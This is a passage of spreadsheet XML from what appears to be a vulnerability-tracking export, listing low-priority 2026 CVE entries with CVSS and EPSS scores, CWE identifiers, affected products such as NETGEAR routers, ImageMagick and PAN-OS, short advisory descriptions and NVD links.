      <c r="M6009" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86181</t>
        </is>
      </c>
    </row>
    <row r="6010">
      <c r="A6010" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6010" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86226</t>
        </is>
      </c>
      <c r="C6010" s="5" t="n">
        <v>2</v>
      </c>
      <c r="D6010" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E6010" s="5" t="inlineStr"/>
      <c r="F6010" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6010" s="5" t="inlineStr"/>
      <c r="H6010" s="5" t="inlineStr"/>
      <c r="I6010" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J6010" s="5" t="inlineStr"/>
      <c r="K6010" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="L6010" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in Projectwolds Online Attendance System 1.0. Affected by this issue is some unknown functionality of the file profile.php. The manipulation of the argument email results in cross site scripting. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks.</t>
        </is>
      </c>
      <c r="M6010" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86226</t>
        </is>
      </c>
    </row>
    <row r="6011">
      <c r="A6011" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6011" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86240</t>
        </is>
      </c>
      <c r="C6011" s="5" t="n">
        <v>2</v>
      </c>
      <c r="D6011" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E6011" s="5" t="inlineStr"/>
      <c r="F6011" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G6011" s="5" t="inlineStr"/>
      <c r="H6011" s="5" t="inlineStr"/>
      <c r="I6011" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J6011" s="5" t="inlineStr"/>
      <c r="K6011" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L6011" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in liufee FeehiCMS up to 2.1.1. This affects the function catchImage of the file backend/widgets/ueditor/Uploader.php of the component UEditor. The manipulation of the argument source[] results in server-side request forgery. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M6011" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86240</t>
        </is>
      </c>
    </row>
    <row r="6012">
      <c r="A6012" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6012" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86271</t>
        </is>
      </c>
      <c r="C6012" s="5" t="n">
        <v>2</v>
      </c>
      <c r="D6012" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E6012" s="5" t="inlineStr"/>
      <c r="F6012" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6012" s="5" t="inlineStr"/>
      <c r="H6012" s="5" t="inlineStr"/>
      <c r="I6012" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J6012" s="5" t="inlineStr"/>
      <c r="K6012" s="5" t="inlineStr">
        <is>
          <t>CWE-862, CWE-863</t>
        </is>
      </c>
      <c r="L6012" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in FluentCMS up to 0.0.5. This affects the function GetAccessible of the file src/Backend/FluentCMS.Services/Permissions/PermissionManager.cs. Performing a manipulation results in missing authorization. It is possible to initiate the attack remotely. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M6012" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86271</t>
        </is>
      </c>
    </row>
    <row r="6013">
      <c r="A6013" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6013" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86301</t>
        </is>
      </c>
      <c r="C6013" s="5" t="n">
        <v>2</v>
      </c>
      <c r="D6013" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E6013" s="5" t="inlineStr"/>
      <c r="F6013" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6013" s="5" t="inlineStr"/>
      <c r="H6013" s="5" t="inlineStr"/>
      <c r="I6013" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J6013" s="5" t="inlineStr"/>
      <c r="K6013" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="L6013" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in code-projects Hospital Information System 1.0. Affected is an unknown function of the file /HIS/src/patients/editPatient.php of the component Patient Management. Such manipulation of the argument ID leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="M6013" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86301</t>
        </is>
      </c>
    </row>
    <row r="6014">
      <c r="A6014" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6014" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86424</t>
        </is>
      </c>
      <c r="C6014" s="5" t="n">
        <v>2</v>
      </c>
      <c r="D6014" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E6014" s="5" t="inlineStr"/>
      <c r="F6014" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G6014" s="5" t="inlineStr"/>
      <c r="H6014" s="5" t="inlineStr">
        <is>
          <t>imagemagick:imagemagick</t>
        </is>
      </c>
      <c r="I6014" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J6014" s="5" t="inlineStr"/>
      <c r="K6014" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L6014" s="5" t="inlineStr">
        <is>
          <t>ImageMagick before 7.1.2-30 and 6.9.13-55 contains a time-of-check-time-of-use (TOCTOU) vulnerability in the video decoder that allows attackers to bypass path policy write restrictions via symlink swaps. An attacker can replace a symlink between policy validation (check-time) and the file write operation (use-time) to write to policy-denied locations.</t>
        </is>
      </c>
      <c r="M6014" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86424</t>
        </is>
      </c>
    </row>
    <row r="6015">
      <c r="A6015" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6015" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86644</t>
        </is>
      </c>
      <c r="C6015" s="5" t="n">
        <v>2</v>
      </c>
      <c r="D6015" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E6015" s="5" t="inlineStr"/>
      <c r="F6015" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G6015" s="5" t="inlineStr"/>
      <c r="H6015" s="5" t="inlineStr"/>
      <c r="I6015" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J6015" s="5" t="inlineStr"/>
      <c r="K6015" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="L6015" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in star7th showdoc up to 3.9.1. This vulnerability affects unknown code of the file web_src/public/editor.md/editormd.js of the component API Page Save Endpoint. Executing a manipulation can lead to cross site scripting. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. Upgrading to version 3.9.2 is able to resolve this issue. This patch is called a8ea1520850b4242f395247f72e87e597506cef0. Upgrading the affected component is recommended. The vendor confirms: "The fix [...] sets Mermaid `securityLevel` to `strict`, disables `htmlLabels`, and sanitizes rendered SVG with DOMPurify."</t>
        </is>
      </c>
      <c r="M6015" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86644</t>
        </is>
      </c>
    </row>
    <row r="6016">
      <c r="A6016" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6016" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86667</t>
        </is>
      </c>
      <c r="C6016" s="5" t="n">
        <v>2</v>
      </c>
      <c r="D6016" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E6016" s="5" t="inlineStr"/>
      <c r="F6016" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6016" s="5" t="inlineStr"/>
      <c r="H6016" s="5" t="inlineStr"/>
      <c r="I6016" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J6016" s="5" t="inlineStr"/>
      <c r="K6016" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L6016" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in aircheng-org iWebShop-5 up to 5.15. The affected element is the function member_list of the file controllers/member.php. This manipulation of the argument Search causes sql injection. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M6016" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86667</t>
        </is>
      </c>
    </row>
    <row r="6017">
      <c r="A6017" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6017" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11735</t>
        </is>
      </c>
      <c r="C6017" s="5" t="n">
        <v>1.9</v>
      </c>
      <c r="D6017" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E6017" s="5" t="inlineStr"/>
      <c r="F6017" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G6017" s="5" t="inlineStr"/>
      <c r="H6017" s="5" t="inlineStr">
        <is>
          <t>netgear:r7000, netgear:r7000_firmware, netgear:rax20, netgear:rax20_firmware, netgear:rax35v2, netgear:rax35v2_firmware, netgear:rax41, netgear:rax41_firmware, netgear:rax41v2, netgear:rax41v2_firmware</t>
        </is>
      </c>
      <c r="I6017" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J6017" s="5" t="inlineStr"/>
      <c r="K6017" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L6017" s="5" t="inlineStr">
        <is>
          <t>A stack-based buffer overflow vulnerability affects the listed NETGEAR models allowing an authenticated admin user to make unauthorized modification to the router's software and functionality.</t>
        </is>
      </c>
      <c r="M6017" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11735</t>
        </is>
      </c>
    </row>
    <row r="6018">
      <c r="A6018" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6018" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11736</t>
        </is>
      </c>
      <c r="C6018" s="5" t="n">
        <v>1.9</v>
      </c>
      <c r="D6018" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E6018" s="5" t="inlineStr"/>
      <c r="F6018" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G6018" s="5" t="inlineStr"/>
      <c r="H6018" s="5" t="inlineStr">
        <is>
          <t>netgear:rax20, netgear:rax20_firmware, netgear:rax35v2, netgear:rax35v2_firmware, netgear:rax41, netgear:rax41_firmware, netgear:rax41v2, netgear:rax41v2_firmware, netgear:rax42, netgear:rax42_firmware</t>
        </is>
      </c>
      <c r="I6018" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J6018" s="5" t="inlineStr"/>
      <c r="K6018" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-787</t>
        </is>
      </c>
      <c r="L6018" s="5" t="inlineStr">
        <is>
          <t>A stack-based buffer overflow vulnerability affects certain NETGEAR models allowing an authenticated admin user to make unauthorized modification to router software and functionality.</t>
        </is>
      </c>
      <c r="M6018" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11736</t>
        </is>
      </c>
    </row>
    <row r="6019">
      <c r="A6019" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6019" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82312</t>
        </is>
      </c>
      <c r="C6019" s="5" t="n">
        <v>1.8</v>
      </c>
      <c r="D6019" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E6019" s="5" t="inlineStr"/>
      <c r="F6019" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G6019" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H6019" s="5" t="inlineStr"/>
      <c r="I6019" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J6019" s="5" t="inlineStr"/>
      <c r="K6019" s="5" t="inlineStr">
        <is>
          <t>CWE-412, CWE-732</t>
        </is>
      </c>
      <c r="L6019" s="5" t="inlineStr">
        <is>
          <t>OpenVPN 2.0.0 through 2.6.22 and 2.7_alpha1 through 2.7.6 on Windows allows local authenticated users to cause a denial of service via a NULL DACL on named IPC objects</t>
        </is>
      </c>
      <c r="M6019" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82312</t>
        </is>
      </c>
    </row>
    <row r="6020">
      <c r="A6020" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6020" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9215</t>
        </is>
      </c>
      <c r="C6020" s="5" t="n">
        <v>1.8</v>
      </c>
      <c r="D6020" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E6020" s="5" t="inlineStr"/>
      <c r="F6020" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G6020" s="5" t="inlineStr"/>
      <c r="H6020" s="5" t="inlineStr"/>
      <c r="I6020" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J6020" s="5" t="inlineStr"/>
      <c r="K6020" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L6020" s="5" t="inlineStr">
        <is>
          <t>A cross site request forgery (CSRF) vulnerability in the listed NETGEAR models allows an attacker who can leverage social engineering techniques on a router administrator to tamper with router configuration and disrupt router operations with active assistance from the router administrator. There is no confidentiality impact due to this vulnerability.</t>
        </is>
      </c>
      <c r="M6020" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9215</t>
        </is>
      </c>
    </row>
    <row r="6021">
      <c r="A6021" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6021" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86227</t>
        </is>
      </c>
      <c r="C6021" s="5" t="n">
        <v>1.3</v>
      </c>
      <c r="D6021" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E6021" s="5" t="inlineStr"/>
      <c r="F6021" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G6021" s="5" t="inlineStr"/>
      <c r="H6021" s="5" t="inlineStr"/>
      <c r="I6021" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J6021" s="5" t="inlineStr"/>
      <c r="K6021" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-125</t>
        </is>
      </c>
      <c r="L6021" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in valkey-io valkey up to 9.0.5/9.1.1. This affects the function kvstoreGetHashtable of the file src/kvstore.c. This manipulation of the argument didx causes out-of-bounds read. It is possible to initiate the attack remotely. The attack is considered to have high complexity. It is indicated that the exploitability is difficult. The exploit has been made available to the public and could be used for attacks. Patch name: 4691888e7fab3df128f0bde5750c9fde2ae552fa. To fix this issue, it is recommended to deploy a patch. Exploitation requires cluster mode plus attacker-controlled dump.rdb at startup (data-dir write access, replication feed, or a stored crafted RDB) - an attacker-position DoS at boot, not network pre-auth. The issue report was closed stating it "is worth fixing for the sake of memory safety… but I don't think it meets our bar for a security disclosure."</t>
        </is>
      </c>
      <c r="M6021" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86227</t>
        </is>
      </c>
    </row>
    <row r="6022">
      <c r="A6022" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6022" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9216</t>
        </is>
      </c>
      <c r="C6022" s="5" t="n">
        <v>1.2</v>
      </c>
      <c r="D6022" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E6022" s="5" t="inlineStr"/>
      <c r="F6022" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6022" s="5" t="inlineStr"/>
      <c r="H6022" s="5" t="inlineStr"/>
      <c r="I6022" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J6022" s="5" t="inlineStr"/>
      <c r="K6022" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L6022" s="5" t="inlineStr">
        <is>
          <t>An insufficient input validation vulnerability in the listed NETGEAR RAX series models allows a network-adjacent attacker having network access (such as WiFi credentials) to crash the router's management UI. There is no confidentiality or integrity impact. A crash of the router's management UI does not impact the availability of the router's core services like WiFi network.</t>
        </is>
      </c>
      <c r="M6022" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9216</t>
        </is>
      </c>
    </row>
    <row r="6023">
      <c r="A6023" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6023" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0291</t>
        </is>
      </c>
      <c r="C6023" s="5" t="n">
        <v>1.1</v>
      </c>
      <c r="D6023" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E6023" s="5" t="inlineStr"/>
      <c r="F6023" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G6023" s="5" t="inlineStr">
        <is>
          <t>windows, palo alto</t>
        </is>
      </c>
      <c r="H6023" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel, paloaltonetworks:prisma_access_agent</t>
        </is>
      </c>
      <c r="I6023" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J6023" s="5" t="inlineStr"/>
      <c r="K6023" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L6023" s="5" t="inlineStr">
        <is>
          <t>An improper link resolution before file access vulnerability exists in the Palo Alto Networks Prisma® Access Agent on Linux platforms that enables a local low privileged user to delete system files in a limited scope and disable Prisma Access Agent.
The Prisma Access Agent on macOS, Windows, iOS, Android, and Chrome OS is not affected.</t>
        </is>
      </c>
      <c r="M6023" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0291</t>
        </is>
      </c>
    </row>
    <row r="6024">
      <c r="A6024" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6024" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0302</t>
        </is>
      </c>
      <c r="C6024" s="5" t="n">
        <v>1.1</v>
      </c>
      <c r="D6024" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E6024" s="5" t="inlineStr"/>
      <c r="F6024" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G6024" s="5" t="inlineStr">
        <is>
          <t>palo alto</t>
        </is>
      </c>
      <c r="H6024" s="5" t="inlineStr"/>
      <c r="I6024" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J6024" s="5" t="inlineStr"/>
      <c r="K6024" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L6024" s="5" t="inlineStr">
        <is>
          <t>An OS command injection vulnerability in Palo Alto Networks Checkov by Prisma® Cloud enables a local user to execute arbitrary commands in the processes running Checkov.</t>
        </is>
      </c>
      <c r="M6024" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0302</t>
        </is>
      </c>
    </row>
    <row r="6025">
      <c r="A6025" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6025" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0308</t>
        </is>
      </c>
      <c r="C6025" s="5" t="n">
        <v>1.1</v>
      </c>
      <c r="D6025" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E6025" s="5" t="inlineStr"/>
      <c r="F6025" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G6025" s="5" t="inlineStr">
        <is>
          <t>java, palo alto</t>
        </is>
      </c>
      <c r="H6025" s="5" t="inlineStr"/>
      <c r="I6025" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J6025" s="5" t="inlineStr"/>
      <c r="K6025" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L6025" s="5" t="inlineStr">
        <is>
          <t>A stored cross-site scripting (XSS) vulnerability in Palo Alto Networks PAN-OS® software enables a malicious authenticated administrator to store or execute a JavaScript payload using the web interface. 
This issue is applicable to PAN-OS software on PA-Series and VM-Series firewalls and on Panorama (virtual and M-Series). 
Cloud NGFW and Prisma® Access are not affected by this vulnerability.</t>
        </is>
      </c>
      <c r="M6025" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0308</t>
        </is>
      </c>
    </row>
    <row r="6026">
      <c r="A6026" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6026" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11733</t>
        </is>
      </c>
      <c r="C6026" s="5" t="n">
        <v>1.1</v>
      </c>
      <c r="D6026" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E6026" s="5" t="inlineStr"/>
      <c r="F6026" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G6026" s="5" t="inlineStr"/>
      <c r="H6026" s="5" t="inlineStr">
        <is>
          <t>netgear:rax41, netgear:rax41_firmware, netgear:rax41v2, netgear:rax41v2_firmware, netgear:rax42, netgear:rax42_firmware, netgear:rax42v2, netgear:rax42v2_firmware, netgear:rax43, netgear:rax43_firmware</t>
        </is>
      </c>
      <c r="I6026" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J6026" s="5" t="inlineStr"/>
      <c r="K6026" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L6026" s="5" t="inlineStr">
        <is>
          <t>A buffer overflow vulnerability in the listed NETGEAR models allows a device administrator to temporarily interrupt the normal operation of the affected device.</t>
        </is>
      </c>
      <c r="M6026" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11733</t>
        </is>
      </c>
    </row>
    <row r="6027">
      <c r="A6027" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6027" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11734</t>
        </is>
      </c>
      <c r="C6027" s="5" t="n">
        <v>1.1</v>
      </c>
      <c r="D6027" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E6027" s="5" t="inlineStr"/>
      <c r="F6027" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G6027" s="5" t="inlineStr"/>
      <c r="H6027" s="5" t="inlineStr">
        <is>
          <t>netgear:mr70, netgear:mr70_firmware, netgear:mr90, netgear:mr90_firmware, netgear:ms70, netgear:ms70_firmware, netgear:ms90, netgear:ms90_firmware, netgear:rax41, netgear:rax41_firmware</t>
        </is>
      </c>
      <c r="I6027" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J6027" s="5" t="inlineStr"/>
      <c r="K6027" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L6027" s="5" t="inlineStr">
        <is>
          <t>A buffer overflow vulnerability in the listed NETGEAR models allows an authenticated admin user to cause the affected device to become temporarily unavailable.</t>
        </is>
      </c>
      <c r="M6027" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11734</t>
        </is>
      </c>
    </row>
    <row r="6028">
      <c r="A6028" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6028" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86422</t>
        </is>
      </c>
      <c r="C6028" s="5" t="n">
        <v>1</v>
      </c>
      <c r="D6028" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E6028" s="5" t="inlineStr"/>
      <c r="F6028" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G6028" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H6028" s="5" t="inlineStr">
        <is>
          <t>imagemagick:imagemagick</t>
        </is>
      </c>
      <c r="I6028" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J6028" s="5" t="inlineStr"/>
      <c r="K6028" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L6028" s="5" t="inlineStr">
        <is>
          <t>ImageMagick before 7.1.2-30 contains a time-of-check-time-of-use vulnerability in path policy enforcement on Windows that allows attackers to bypass read or write restrictions by exploiting symlink race conditions. Attackers can swap symlinks between policy validation and file access to read or write policy-denied files.</t>
        </is>
      </c>
      <c r="M6028" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86422</t>
        </is>
      </c>
    </row>
    <row r="6029">
      <c r="A6029" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6029" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88790</t>
        </is>
      </c>
      <c r="C6029" s="5" t="n">
        <v>0.9</v>
      </c>
      <c r="D6029" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E6029" s="5" t="inlineStr"/>
      <c r="F6029" s="5" t="inlineStr"/>
      <c r="G6029" s="5" t="inlineStr"/>
      <c r="H6029" s="5" t="inlineStr"/>
      <c r="I6029" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J6029" s="5" t="inlineStr"/>
      <c r="K6029" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L6029" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in proma-ai Proma up to 0.19.37. Affected is the function resolveTargetPath of the file apps/electron/src/main/lib/file-preview-service.ts of the component File Preview Service. Such manipulation of the argument file_path leads to path traversal. Local access is required to approach this attack. The exploit has been disclosed publicly and may be used. Upgrading to version 0.19.52 is able to address this issue. The name of the patch is b7bf78ab74b1552c92fc98c7db9a8a8d92c631df. It is suggested to upgrade the affected component. The PoC's candidateBasePaths parameter name does not match the current IPC API (0.19.52 uses FileAccessOptions with internal getPreviewCandidateBasePaths()). The reporter likely targeted 0.16.3 where the IPC handler accepted raw string[] base paths. The core vulnerability - basename-collision fallback - is independent of the parameter name and is confirmed in source.</t>
        </is>
      </c>
      <c r="M6029" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88790</t>
        </is>
      </c>
    </row>
    <row r="6030">
      <c r="A6030" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6030" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0289</t>
        </is>
      </c>
      <c r="C6030" s="5" t="n">
        <v>0.5</v>
      </c>
      <c r="D6030" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E6030" s="5" t="inlineStr"/>
      <c r="F6030" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6030" s="5" t="inlineStr">
        <is>
          <t>palo alto</t>
        </is>
      </c>
      <c r="H6030" s="5" t="inlineStr">
        <is>
          <t>paloaltonetworks:prisma_browser</t>
        </is>
      </c>
      <c r="I6030" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J6030" s="5" t="inlineStr"/>
      <c r="K6030" s="5" t="inlineStr">
